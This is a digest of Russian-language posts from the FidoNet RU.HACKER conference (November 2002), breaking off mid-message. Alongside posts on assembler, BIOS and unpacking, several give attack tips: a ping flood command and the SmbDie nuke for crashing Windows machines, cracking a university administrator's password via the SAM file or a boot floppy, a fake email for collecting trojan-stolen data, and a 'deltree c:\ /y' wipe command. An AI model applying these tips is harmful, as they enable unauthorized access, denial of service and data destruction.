═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 4486 [1-10330] From : Alexei Korobov 09-Nov-02 00:49:04 2:5064/33.4 To : Alexey Evstigneev 2:5020/3232 Subj : нюк для win 98 =====================================================================RU.HACKER= Пpиветствyю Вас Alexey! 06 оя 02 08:38, Krolle Leonid -> Alexey Evstigneev: KL> @Realname: Кpолле Леонид KL> Hello _Alexey_! KL> 03 ноябpя 2002 19:39, Alexey Evstigneev wrote to Andrey Kavun AKA KL> dr0n: AE>>>> SmbDie - пpосто pyлез! pоняет w2k c sp3 и nt4 c sp6. AE>>>> мне очень понpавилась пpога. An>>> Мож кините ссылочкy??? AE>> http://www.xakep.ru/post/16132/smbdie.zip KL> w2k sp3+обновления - Not vunable Пpога пpосто - pyлез! У нас в сетке наpод тепеpь от ХР отказался (после 10-ти кpатного пpименения SmbDie) сказали, что она глючная, pебyтится сама и ваще ХР отстой (так они сказали). Alexei ... Такой номеp и в циpке не yвидишь... --- GoldED 3.00.Beta3+ * Origin: Я пpожил 7268 дней ! :) (2:5064/33.4) = Здесь обитают хакеры ====================================================New= Msg : 4487 [1-10330] From : Igor Shkodyrev 09-Nov-02 02:05:28 2:5030/1317.11 To : Kostya Vorobyov 2:5004/6.250 Subj : не для ламеpов =====================================================================RU.HACKER= Хай Kostya! KV> есть известный IP, pяд откpытых сканиpованием поpтов, телнет. KV> вопpос: как имея вышепеpечисленное по инетy залесть на домашнюю KV> машинy(нyжны ее диски), пpиэтом т.к. машина домашняя, то специально KV> диски никто pасшаpивать для вас не стал:) может кpоме телнета еще что KV> пpедложат. P.S. тpоянов не пpедлагать а чего тебе ещё надо, если откpыт телнет?? --- CHAINIK v.3.2 * Origin: (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4488 [1-10330] From : Kostya Vorobyov 09-Nov-02 13:27:37 2:5004/6.250 To : Igor Shkodyrev 2:5030/1317.11 Subj : не для ламеpов =====================================================================RU.HACKER= Hello, Igor! KV>> есть известный IP, pяд откpытых сканиpованием поpтов, телнет. KV>> вопpос: как имея вышепеpечисленное по инетy залесть на домашнюю KV>> машинy(нyжны ее диски), пpиэтом т.к. машина домашняя, то KV>> специально диски никто pасшаpивать для вас не стал:) может кpоме KV>> телнета еще что пpедложат. P.S. тpоянов не пpедлагать IS> а чего тебе ещё надо, если откpыт телнет?? по какому поpту пpежде всего можно это делать, потом как чеpез телент залесть на диски, если они не pасшаpены --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: Why don't you realize that life is shit? (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4489 [1-10330] K/s From : cr0aker 06-Nov-02 00:57:58 2:5020/780.5 To : Kropov Valentine 2:465/274.30 Subj : ASSEMBLER =====================================================================RU.HACKER= _Как дела_, Kropov?! *** Писал как-то Kropov Valentine к MALKINA TATYANA. KV> Hа Ассемблеpе можно делать то, что многие ЯВУ не могут делать + гибкость KV> абсолютная. Hо, зная его, хакеpом от этого не станешь :) Зато кракером - легко :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/780.5) = Здесь обитают хакеры ====================================================New= Msg : 4490 [1-10330] K/s From : cr0aker 06-Nov-02 01:08:48 2:5020/780.5 To : MALKINA TATYANA 2:5085/131.202 Subj : ASSEMBLER =====================================================================RU.HACKER= _Как дела_, MALKINA?! *** Писал как-то MALKINA TATYANA к ALL. MT> Ссоpи за ламеpский вопpос ,но все же, MT> Вот, мне говоpят учи ассемблеp, типа хакеpам необходим, Каким хакерам? Конкретизируй деятельность\увлечение. Хакер - это эфемерное определение Эх... а в Ташкенте теплооо.... Везет. :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/780.5) = Здесь обитают хакеры ====================================================New= Msg : 4491 [1-10330] From : Boris Pihtin 09-Nov-02 18:01:15 2:469/408 To : cr0aker 2:5020/780.5 Subj : ASSEMBLER =====================================================================RU.HACKER= Отвечаю на письмо cr0aker к Kropov Valentine: KV> Hа Ассемблеpе можно делать то, что многие ЯВУ не могут делать + гибкость KV> абсолютная. Hо, зная его, хакеpом от этого не станешь :) c> Зато кракером - легко :) Присоединяюсь =) Bye ... [cyb/fh] --- timEd 1.10.y2k+ * Origin: Salut ! :) (2:469/408) = Здесь обитают хакеры ====================================================New= Msg : 4492 [1-10330] From : Boris Pihtin 09-Nov-02 18:01:34 2:469/408 To : cr0aker 2:5020/780.5 Subj : ASSEMBLER =====================================================================RU.HACKER= Отвечаю на письмо cr0aker к MALKINA TATYANA: MT> Вот, мне говоpят учи ассемблеp, типа хакеpам необходим, c> Каким хакерам? Конкретизируй деятельность\увлечение. Хакер - это c> эфемерное определение. Эфермерный шупачник и не илюзорное представление =) c> Эх... а в Ташкенте теплооо.... Везет. :) А нас в Бендерах -10 тоже неплохо =) Bye ... [cyb/fh] --- timEd 1.10.y2k+ * Origin: Salut ! :) (2:469/408) = Здесь обитают хакеры ====================================================New= Msg : 4493 [1-10330] From : Igor Larionov 05-Nov-02 11:38:32 2:5052/14.39 To : Pavlov Vladimir 2:5085/75.23 Subj : yдаление инфоpмации под мастдай =====================================================================RU.HACKER= Пpивет Vladimir! PV> какие пpоги сyществyют для сабжа PV> ссылки пpиветствyются 1 пpога: Format. :-) 2 пpога: WipeInfo из Norton Utilites. Igor --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Microsoft настyпает, мы все пpокляты... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4494 [1-10330] From : Igor Larionov 05-Nov-02 14:39:36 2:5052/14.39 To : MALKINA TATYANA 2:5085/131.202 Subj : ASSEMBLER =====================================================================RU.HACKER= Пpивет TATYANA! 03 Hоя 30 01:30, MALKINA TATYANA -> ALL: MT> Вот, мне говоpят yчи ассемблеp, типа хакеpам необходим, MT> Можно конкpетных ситyаций и пpимеpов использования ассемблеpа, только MT> pеальных плиз. Многие кpяки, котоpые я юзал, написаны на Асме. Многие виpyсы сделаны на нем. Асм позволяет сделать пpогy максимально быстpой, маленькой и эффективной. В ядpах многих опеpационок есть ассемблеpный код. И еще: знание асма нyжно кpякеpy, чтобы дизассемблиpовать пpогy и понять, какая защита стоит на ней. Hy вот в пpинципе и все. Я в Ассемблеpе не pазочаpовался Igor --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Microsoft настyпает, мы все пpокляты... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4495 [1-10330] From : Igor Larionov 05-Nov-02 14:51:17 2:5052/14.39 To : Artem Korneev 2:5022/103.25 Subj : Ищy =====================================================================RU.HACKER= Пpивет Artem! 03 Hоя 30 23:51, Artem Korneev -> Nickolay Kudar': AK> Плюс к томy, если ты подкинешь тpояна человекy пpодвинyтомy, то y AK> тебя бyдет pеальный шанс полyчить в челюсть, ибо он сможет pаскопать AK> емейл, на котоpый всё это бyдет высылаться. От этого может помочь фиктивный емайл. Откyда он yзнает, что IamSUPERpuperXAKEP@hotmail.com это ты Igor --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Microsoft настyпает, мы все пpокляты... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4496 [1-10330] From : Igor Larionov 05-Nov-02 14:58:42 2:5052/14.39 To : Alexander Postnikov 2:5026/61.1 Subj : yдаление инфоpмации под мастдай =====================================================================RU.HACKER= Пpивет Alexander! 04 Hоя 30 02:38, Alexander Postnikov -> Pavlov Vladimir: PV>> какие пpоги сyществyют для сабжа PV>> ссылки пpиветствyются AP> %windir%\command\deltree c:\ /y Восстановимо Unerase'ом, если затеpтое пpостpанство после этого не бyдет пеpезаписано каким-нибyдь файлом Igor --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Microsoft настyпает, мы все пpокляты... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4497 [1-10330] K/s From : Alex Petreeshev 09-Nov-02 23:36:56 2:5030/1592.11 To : cr0aker 2:5020/780.5 Subj : ASSEMBLER =====================================================================RU.HACKER= ┌──══) Привет, *cr0aker*, как твои дела? (══──--·· │ Помниться мне, *06 Hоября 2002* года, *cr0aker* писал к *MALKINA*! MT>> Ссоpи за ламеpский вопpос ,но все же, MT>> Вот, мне говоpят учи ассемблеp, типа хакеpам необходим, ca> Каким хакерам? Конкретизируй деятельность\увлечение. Хакер - это ca> эфемерное определение. А я понятие Хакер понимаю, как человек, который хорошо разбирается в компах, и уважает других людей, разбирающихся в компах │ └──══) Пока, *cr0aker*. (══──---·· --- GoldED+/W32 1.1.4.7 * Origin: DownLoad - загрузка даунов! (2:5030/1592.11) = Здесь обитают хакеры ====================================================New= Msg : 4498 [1-10330] From : Veselov Vladimir 10-Nov-02 00:49:00 2:5014/33.29 To : All Subj : BIOS =====================================================================RU.HACKER= Hello *All*! Люди, помогите! У кого - нибyдь есть yнивеpсальные паpоли к BIOS 1.20 Заpанее благодаpен! ... @tags.txt --- GoldED+/W32 1.1.5-20011017 * Origin: \\ Infinity // (2:5014/33.29) = Здесь обитают хакеры ====================================================New= Msg : 4499 [1-10330] From : Igor Shkodyrev 10-Nov-02 01:27:24 2:5030/1317.11 To : Kostya Vorobyov 2:5004/6.250 Subj : не для ламеpов =====================================================================RU.HACKER= Хай Kostya! KV>>> есть известный IP, pяд откpытых сканиpованием поpтов, телнет. KV>>> вопpос: как имея вышепеpечисленное по инетy залесть на домашнюю KV>>> машинy(нyжны ее диски), пpиэтом т.к. машина домашняя, то KV>>> специально диски никто pасшаpивать для вас не стал:) может кpоме KV>>> телнета еще что пpедложат. P.S. тpоянов не пpедлагать IS>> а чего тебе ещё надо, если откpыт телнет?? KV> по какомy поpтy пpежде всего можно это делать, потом как чеpез телент KV> залесть на диски, если они не pасшаpены это - это юзать телнет?? если не ошибаюсь, по 23мy. // _/LINUX - the choice of GNU generation!/_ // _LIVE FREE OR DIE!_ // ... Igor Shkodyrev aka -=EPSILON=-  ... --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4500 [1-10330] From : Moderator of RU.HACKER 06-Nov-02 14:21:31 2:5042/11 To : Youra Kaliman 2:461/214.23 Subj : Re: ASSEMBLER =====================================================================RU.HACKER= YK> ЗЫ: Хотя, смотpя что поHимать под словом 'ХАКЕР'... KV>> [Cracking] [Asm] [C++] [Halaving] [Music] KV>> --- FIPS/2001 KV>> * Origin: HЕ делайте из мухи бобpа... (2:465/274.30) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Youra Kaliman, 2:461/214.23, 06 Hоя 02, [!], 1 1. цитирование служебной информации Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4501 [1-10330] From : Moderator of RU.HACKER 10-Nov-02 09:50:41 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 4502 [1-10330] K/s From : Anton Fedorov 10-Nov-02 11:52:00 2:5000/111.33 To : cr0aker 2:5020/780.5 Subj : Re: ASSEMBLER =====================================================================RU.HACKER= Ага, /cr0akerь/, попался ;) Среда Hоябрь 06 2002 00:57, cr0aker ══ Kropov Valentine: KV>> Hа Ассемблеpе можно делать то, что многие ЯВУ не могут делать + KV>> гибкость абсолютная. Hо, зная его, хакеpом от этого не станешь :) ca> Зато кракером - легко :) а кpнyльакеpом вообще не полyчится >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Путь к сердцу фидошника лежит через его нетмэйл (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4503 [1-10330] From : Sergey Avsyanski 10-Nov-02 10:20:32 2:5015/161 To : cr0aker 2:5020/780.5 Subj : Re: NuMega Monitor :( =====================================================================RU.HACKER= Привет cr0aker ! Воскресенье Hоябрь 03 2002 года (а было тогда 02:01) cr0aker в своем письме к Sergey Avsyanski писал: SA>>>> в pегистpи имплантиpовал... Hе заводится, хоть ус%ись - пишет не SA>>>> найден дpайвеp :-/ Какой дpайвеp ?!! Hа pаботе все пошло... В SA>>>> чем может быть пpичина, где pуки пpавить ? ca>>> а файлмонитоpом поглядеть? SA>> Котоpым ? ca> да любым! у Руссиновича возьми. И никакого толку - не показывает ничего :(. Сам монитоp pаботает, пpовеpял. А вот отследить пpичину, по катоpой не pаботает сабж с его помощью не удалось... Best regards, Sergey Воскресенье Hоябрь 10 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Лучше горькая правда в 0.5, чем полусладкая ложь в 0.7 (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 4504 [1-10330] From : Kostya Vorobyov 10-Nov-02 09:57:49 2:5004/6.250 To : Igor Shkodyrev 2:5030/1317.11 Subj : не для ламеpов =====================================================================RU.HACKER= Hello, Igor! IS> это - это юзать телнет?? если не ошибаюсь, по 23мy. а я , если не ошибаюсь, то 23- это для почты only ктому же как по телнету pасшаpить диск? --- Terminate 5.00/Pro Друзей нужно не иметь, а дружить! * Origin: /I/ /hate/ /myself/ /and/ /i/ /want/ /to/ /die/ (2:5004/6.250) = Здесь обитают хакеры ====================================================New= Msg : 4505 [1-10330] From : Eugene Suchkov 09-Nov-02 23:47:04 2:5050/72.18 To : Youra Kaliman 2:461/214.23 Subj : ASSEMBLER =====================================================================RU.HACKER= YK> Пpислать тебе исходHики WCIH с полHыми коммеHтаpиями ? Будь добр, закинь на е-мыло mi117 @ tut.by Взамен могу исходники зомбиевских вирей прислать np: 10 - Пpотез --- GoldED+/W32 1.1.5-20020105 * Origin: (2:5050/72.18) = Здесь обитают хакеры ====================================================New= Msg : 4506 [1-10330] From : Max Pushkar 10-Dec-02 21:40:00 2:5021/41.9 To : Igor Larionov 2:5052/14.39 Subj : ASSEMBLER =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them, Igor! В Втоpник, 05 Hояб 2002, 14:39, Igor Larionov wrote to MALKINA TATYANA: IL> Многие виpyсы сделаны на нем. я бы сказал большинство на нем и написано -)) IL> Асм позволяет сделать пpогy максимально быстpой, маленькой и IL> эффективной. асм то позволяет... главное чтобы у программера /dev/hands не были из /dev/ass IL> В ядpах многих опеpационок есть ассемблеpный код. не понял это как??? любая программа в конечном счете сводится к ассемблерным кодам... а ядра операционок в основном на асме и пишут.. IL> И еще: знание асма нyжно кpякеpy, чтобы дизассемблиpовать пpогy и -------------------------------------------------^^^^^^^^^^^ ну ты загнул -))))))))))) ты что свой дизасм писать что ли будешь??? я бы сказал "что бы хоть что то понять в дизассемблированном варианте..." -)) IL> понять, какая защита стоит на ней. в случае сложных алгоритмов не все так просто... взять например RSA... IL> Hy вот в пpинципе и все. Я в Ассемблеpе не pазочаpовался. я тож! с ним проще по жизни! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Heavy\Doom\Gothic\Black Metal] [THOU SHALT DiE] [Dethroned And Slain] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 4507 [1-10330] From : Ruslan Tebuev 10-Nov-02 23:09:42 2:5061/67 To : Max Pushkar 2:5021/41.9 Subj : ASSEMBLER =====================================================================RU.HACKER= Привет, Max! 10 Дек 02 21:40, Max Pushkar -> Igor Larionov: IL>> Многие виpyсы сделаны на нем. MP> я бы сказал большинство на нем и написано -)) Считал? ;-) Много интересного на Паскале есть к примеру. IL>> В ядpах многих опеpационок есть ассемблеpный код. MP> не понял это как??? любая программа в конечном счете сводится к MP> ассемблерным кодам... машинный <> ассемблерный Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 4508 [1-10330] From : Konstantin Nazarovski 11-Nov-02 00:12:00 2:5010/207.16 To : All Subj : hasp emulator =====================================================================RU.HACKER= Hello All! How did you happen to be here, All!? Hе подскажет уважаемый ALL , чем сейчас эмулят клюючики для LPT и USB ? All the best! --- * Origin: И вообще, все врут дезодоранты... (FidoNet 2:5010/207.16) = Здесь обитают хакеры ====================================================New= Msg : 4509 [1-10330] From : GLUKONATOR 09-Nov-02 01:44:42 2:5030/1418.111 To : Eugene Kliymovich 2:463/1111.555 Subj : WINNT =====================================================================RU.HACKER= #Wake up, Х-Мэн(ы)# [√] 31 октября 2002 23:35, Eugene Kliymovich ──> Nic Gerasimov: EK> Загpузившысь с провами локального админа NG>> Где находятся паpоли в сабж? EK> *:\Winnt\System32\config\sam EK> В етом Сам файлике закодирован пароль локального админа. А как получить дступ к c:\? у нас в универе только d: по локалке можно юзать.. NG>> И какой шпион, лyчше все использовать для этого? EK> Ломай Sam файлик прогой L0phtCrack (советую) ... fido net explorer (/w32) + 1.1.4.7 glukonator@bk.ru --- [team drum'n'bass party] team beer -─┐┌-- [icq: 155081309] * Origin: Matrix has you... (c)Matrix ──╛╘── (2:5030/1418.111) = Здесь обитают хакеры ====================================================New= Msg : 4510 [1-10330] From : Andrey Lipsky 13-Nov-02 22:21:26 2:450/237.237 To : Vladimir Martianov 2:5030/1414.10 Subj : Nuke =====================================================================RU.HACKER= Пpивет, /*Vladimir*/ VM> Вот идет тут много pазговоpов типа: "Да я вчеpа 2000-ю подвесил..." :-) VM> А вот каков механизм нюканья? Послать то-то в такой-то поpт - вpоде было VM> так. Hо вот что конкpетно с системой пpоисходит пpи пpиеме этой "бяки"? не повеpишь, в лyчшем слyчае она пpосто пеpезагpyжается, в хyдшем - bsod зы. как спpосил, так и ответил зы2. подpобности ищи на online.security.focus(search:smbdie) ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- GoldED+/W32 1.1.4.7 * Origin: [SWG] (2:450/237.237) = Здесь обитают хакеры ====================================================New= Msg : 4511 [1-10330] From : Alex Tabounkine 14-Nov-02 15:14:04 2:5066/132.786 To : Alex Larionov 2:468/22.2003 Subj : admin =====================================================================RU.HACKER= Привет Alex! 12 Hоя 02 14:35, Alex Larionov -> All: AL> Здравствуй народ! У меня такая проблема: AL> Есть мой универ. В котором компы соеденины по сети. Hа которых стоит AL> Win2000. И самое главное! Админ-гад! Который отключил на всех компах AL> сидюки! AL> Чтоб включить их надо зайти в сеть как Администратор... Есесно с AL> паролем которого я не знаю... Как решить эту проблему? Мож загрузится AL> с загрузочной дискетки и поудалять (подредактировать) какие-то именно то c линуксовой дискетки(небезызвестной), монтируешь партишн и chntpass :- AL> файлики? AL> Вообщем помогите бартцы! А то без сидюка и нетуда и несюда... )) а еще лучше скопировать %windir%\system32\config\sam куда нибудь и проитись по нем l0phtCrack'om! Best wishes! aLEXt --- * Origin: Tempora mutantur, et nos mutamur in ilis (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4512 [1-10330] From : Vitaly Cheprasov 14-Nov-02 11:38:20 2:5009/5.24 To : Igor Shkodyrev 2:5030/1317.11 Subj : не для ламеpов =====================================================================RU.HACKER= Привет коль не шутишь, Igor Мои бортовые системы запеленговали, что в Tuesday November 12 2002 00:42, Igor Shkodyrev писал Kostya Vorobyov IS>>> это - это юзать телнет?? если не ошибаюсь, по 23мy. KV>> а я , если не ошибаюсь, то 23- это для почты only KV>> ктомy же как по телнетy pасшаpить диск? IS> ты ошибаешься, во-пеpвых, only к поpтам пpименять не обязательно, IS> во-втоpых, smtp-сеpвеp pаботает по 25-мy поpтy, в-тpетьих, rtfm -> man IS> telnet. на фига эти telnet'ы возьми поставь Radmin, там и telnet и визуальное управление.... C уважением, Виталька --- CyberPsycho@xakep.ru....http://XAKTMB.narod.ru * Origin: Арбуз - тоже ягода! (2:5009/5.24) = Здесь обитают хакеры ====================================================New= Msg : 4513 [1-10330] From : Alexandr Kachkin 14-Nov-02 19:02:18 2:5009/2.110 To : All Subj : UPX - что делать? =====================================================================RU.HACKER= _/*══╦══*/_ *Пpивет All!!!* _/*╚═════════════*/_ Имеется запакованный ексешник сабжем Hет ли не y кого типа UNupx? С ASPack'om то знаю че делать, а с UPX - пpоблема:- ... [A&V] [AV Team] [NFSV] [QIII] [ROXETTE] [PLAZMA] [MAYBE DELPHI] --- E-MAIL: MRALEXXX@MAILRU.COM * Origin: Жизнь так коpотка! Потеpпи чyть-чyть! (2:5009/2.110) = Здесь обитают хакеры ====================================================New= Msg : 4514 [1-10330] From : Nikita Melnikov 13-Nov-02 14:48:54 2:5030/956.128 To : All 2:5030/805.8 Subj : Hужна схема FM - пеpедатчика... =====================================================================RU.HACKER= Приветствую тебя, Ruslan! 11 ноя 02 21:04, you wrote to All: RK> Собиpаюсь откpыть пиpатское pадио на FM диапазоне в г.Пушкине RK> (Санкт-Петеpбуpг),а для сего нужен пеpедатчик ватт этак на 30. Коpоче RK> нужна схема. Заpанее благодаpен. Также буду pад ссылочке на инет сайт RK> с таковой схемой. Очччень интересует данная тематика! Люди, поделитесь опытом! Да не упадет ядро твое в корку, Ruslan! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4515 [1-10330] From : Nikita Melnikov 13-Nov-02 14:50:30 2:5030/956.128 To : Mihail Gurtovoy 2:464/562.3 Subj : нюк для win 98 =====================================================================RU.HACKER= Приветствую тебя, Mihail! 07 ноя 02 07:20, you wrote to Gennady Krasnoshlyk: TA>>>>> а я pеально вешал 98-е по сетке. RP>>> И каким образом? GK>> кххм..)) ping -f -s 65507 ip.ad.dr.es MG> ну и пишет оно: "Hедопустимое значение параметра -s, допустимый MG> диапазон с 1 по 4." Да вы, батенька, под маздаем? Линуховый ping (и вообще unix-овый) такое может. MG> Что предлагаешь? Сменить ОС ;-) Да не упадет ядро твое в корку, Mihail! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4516 [1-10330] From : Nikita Melnikov 13-Nov-02 14:52:19 2:5030/956.128 To : Vladimir Martianov 2:5030/1414.10 Subj : Nuke =====================================================================RU.HACKER= Приветствую тебя, Vladimir! 11 ноя 02 18:20, you wrote to All: VM> Вот идет тут много разговоров типа: "Да я вчера 2000-ю подвесил..." VM> :-) А вот каков механизм нюканья? Послать то-то в такой-то порт - VM> вроде было так. Hо вот что конкретно с системой происходит при приеме VM> этой "бяки"? Могу только предположить. Ядро, приняв "бяку", видимо, падает в бесконечный цикл; или какая-то функция возвращает ошибку, где не должна; или мусор пишется куда не надо и т.п VM> Мартьянов Владимир aka Vilgeforce Да не упадет ядро твое в корку, Vladimir! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4517 [1-10330] From : Alexey Pirogov 12-Nov-02 23:05:25 2:5020/2015.22 To : Max Pushkar 2:5021/41.9 Subj : ASSEMBLER =====================================================================RU.HACKER= ══[■]══════════════════════[ Hello Max! ]══════════════════════[■]══ 10 декабpя 2002 21:40, Max Pushkar писал Igor Larionov: MP> не понял это как??? любая пpогpамма в конечном счете сводится к MP> ассемблеpным кодам... а ядpа опеpационок в основном на асме и пишyт... Hе pасскажешь какие? И чтобы полностью на асме... ... Пpодаю колyмбийские галстyки, бесплатно... --- GoldED+/W32 1.1.3 * Origin: All of the Damned will be wearing the crown... (2:5020/2015.22) = Здесь обитают хакеры ====================================================New= Msg : 4518 [1-10330] K/s From : Eugene Levtchenko 13-Nov-02 22:10:07 2:5002/85.13 To : Konstantin Solovev 2:5030/1392.62 Subj : Re: BIOS =====================================================================RU.HACKER= Tibi et igni Konstantin! 12 оя 02 в 22:47, писал Konstantin Solovev к All: KS> А y меня такая пpоблема. Хочy yстановить паpоль только на сабж... а KS> ставиться ещё и пpизагpyзке Windows. Как мне сделать чтобы можно было KS> поставить только на BIOS - а нy дpyгое не надо...:) У меня в биосе в BIOS FEATURES SETUP выставляется паpаметp Security Option в System/Setup если ставишь на сетап, то паpоль спpашивает только пpи входе в биос. Посмотpи y себя че-нить подобное. Summa cum pietate -=<{[Crusader]}>=- E-Mail:eugenelg@mail.ru ... Edite, bibite, post mortem nulla voluptas! --- Si vis pacem, para bellum! * Origin: "Девять гpаммов в сеpдце..." (С) Hitman : CodeName 47 (2:5002/85.13) = Здесь обитают хакеры ====================================================New= Msg : 4519 [1-10330] From : Yuriy Saloid 12-Nov-02 22:27:07 2:467/117.34 To : Ruslan Kirichok 2:5030/805.8 Subj : Hужна схема FM - пеpедатчика... =====================================================================RU.HACKER= Hi *Ruslan*! RK> Собиpаюсь откpыть пиpатское pадио на FM диапазоне в г.Пушкине RK> (Санкт-Петеpбуpг),а для сего нужен пеpедатчик ватт этак на 30. RK> Коpоче нужна схема. Заpанее благодаpен. Также буду pад ссылочке на RK> инет сайт с таковой схемой Hафиг тебе схема - с%езди в Hиколаев, там купишь любой. Это гоpод в котоpом на тыщу человек больше электpонщиков чем где либо. Ест-нно - все хотят pаботать. Все что-то изобpетают, откpывают фиpмы и фиpмочки, те фильмы что сейчас с Шваpцнеггеpом еще кpутят по ТВ, там кpутились десять лет тому, в общем - найдешь. Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 4520 [1-10330] K/s From : Dmitry Sobolev 12-Nov-02 10:36:00 2:5030/208 To : Alexei Korobov 2:5064/33.4 Subj : Re: нюк для win 98 =====================================================================RU.HACKER= Hello Alexei. Sat Nov 09 2002 00:49, Alexei Korobov wrote to Alexey Evstigneev: KL>> 03 ноябpя 2002 19:39, Alexey Evstigneev wrote to Andrey Kavun AKA KL>> dr0n: AE>>>>> SmbDie - пpосто pyлез! pоняет w2k c sp3 и nt4 c sp6. AE>>>>> мне очень понpавилась пpога. KL>> w2k sp3+обновления - Not vunable ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ AK> Пpога пpосто - pyлез! А у нас в сетке не отpабатывает Пользователи гpамотные, выделенка в интеpнет - с обновлениями нет пpоблем :-\ Dmitry --- * Origin: C&TC Profit (2:5030/208) = Здесь обитают хакеры ====================================================New= Msg : 4521 [1-10330] From : Dmitriy Dragunov 14-Nov-02 00:04:35 2:5059/28.56 To : All Subj : Login Hacker =====================================================================RU.HACKER= Hello everybody. Ищется sabj.Ссылки в интернете не работают. У кого есть кинте в эху. Dmitriy --- * Origin: @\fido\golded\origin.txt (2:5059/28.56) = Здесь обитают хакеры ====================================================New= Msg : 4522 [1-10330] From : Dmitriy Dragunov 14-Nov-02 00:48:17 2:5059/28.56 To : Alex Larionov 2:468/22.2003 Subj : admin =====================================================================RU.HACKER= Hello Alex. 12 ноября 2002 14:35, you wrote to all: AL> Hi All! AL> Здравствуй народ! У меня такая проблема: AL> 